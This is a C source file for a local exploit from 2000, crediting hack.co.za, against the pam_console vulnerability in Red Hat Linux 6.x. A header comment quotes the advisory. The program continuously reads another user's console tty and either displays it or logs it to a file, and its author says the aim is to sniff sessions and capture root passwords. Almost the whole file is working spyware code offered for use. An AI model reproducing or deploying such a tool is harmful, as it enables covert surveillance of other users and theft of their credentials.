/*
 
   Pam'Console'logger by wC
 
   Description:
   Thiz enables you to log a tty to a file! =)
 
   According to a advisorie at www.securityfocus.com:
 
   A vulnerability exists in the pam_console PAM module, included as part of
   any Linux system running PAM. pam_console exists to own certain devices to
   users logging in to the console of a Linux machine. It is designed to allow
   only console users to utilize things such as sound devices. It will chown
   devices to users upon logging in, and chown them back to being owned by root
   upon logout. However, as certain devices do not have a 'hangup' mechanism,
   like a tty device, it is possible for a local user to continue to monitor
   activity on certain devices after logging out. This could allow an malicious
   user to sniff other users console sessions, and potentially obtain the root
   password if the root user logs in, or a user su's to root. They could also
   surreptitiously execute commands as the user on the console.
 
   Vulnerable :
 
   RedHat Linux 6.2 sparc
   RedHat Linux 6.2 i386
   RedHat Linux 6.2 alpha
   RedHat Linux 6.1 sparc
   RedHat Linux 6.1 i386
   RedHat Linux 6.1 alpha
   RedHat Linux 6.0 sparc
   RedHat Linux 6.0 i386
   RedHat Linux 6.0 alpha
 
   Notice:
 
   I didnt code this from scratch cause there was allready a exploit available
   at the securityfocus site!
   I just added a easy feature to let thiz biatx log'to a file :]
   If you dont like it..dont use it ;)
 
   Sintaxe:
 
   Do the follownig to log a tty and output it to the screen...
 
   progname </dev/ttyN to spy on> -output
 
   Do the follownig to log a tty and output it to a logfile...
 
   progname </dev/ttyN to spy on> -l <logfilename>
 
   Who am i:
   Genetik Team Member
   wildcoyote@gk-team.org
 
*/

#include <stdio.h>
#include <sys/fcntl.h>

void
sintaxe(char *progname)
{
  printf("\n\tPam'console'logger by wC\n\n");
  printf("Sintaxe: %s </dev/ttyN to spy on> -output\n",progname);
  printf("                                  -l <logfilename>\n");
  printf("If you want to leave this running on background had a &\n");
  printf("to the end of the sintaxe...\n");
  printf("Please edit the source file and read the top'commentz\n");
  printf("Thankz to securityfocus for the advisorie and the *original* code\n");
  printf("Flamez to: wildcoyote@gk-team.org\n\n");
}

main(int argc,char *argv[])
{
  char buf[80*24];
  int sf;
  FILE *fx;
  if (argc<3)
    {
      sintaxe(argv[0]);
      exit(-1);
    }
  else
    {
      printf("\n\tPam'console'logger by wC\n\n");
      if (strcasecmp(argv[2],"-output")==0)
        {
          sf=open(argv[1],O_RDWR);
          while (1)
            {
              lseek(sf,0,0);
              read(sf,buf,sizeof(buf));
              write(1,"\033[2J\033[H",7);
              write(1,buf,sizeof(buf));
              usleep(10000);
            }
        }
      else
        if ((strcasecmp(argv[2],"-l")==0) && (argc>=4))
          {
            sf=open(argv[1],O_RDWR);
            while (1)
              {
                lseek(sf,0,0);
                read(sf,buf,sizeof(buf));
                fx=fopen(argv[3],"a");
                fputs(buf,fx);
                usleep(10000);
              }
          }
        else sintaxe(argv[0]);
    }
}
/*                    www.hack.co.za           [14 June 2000]*/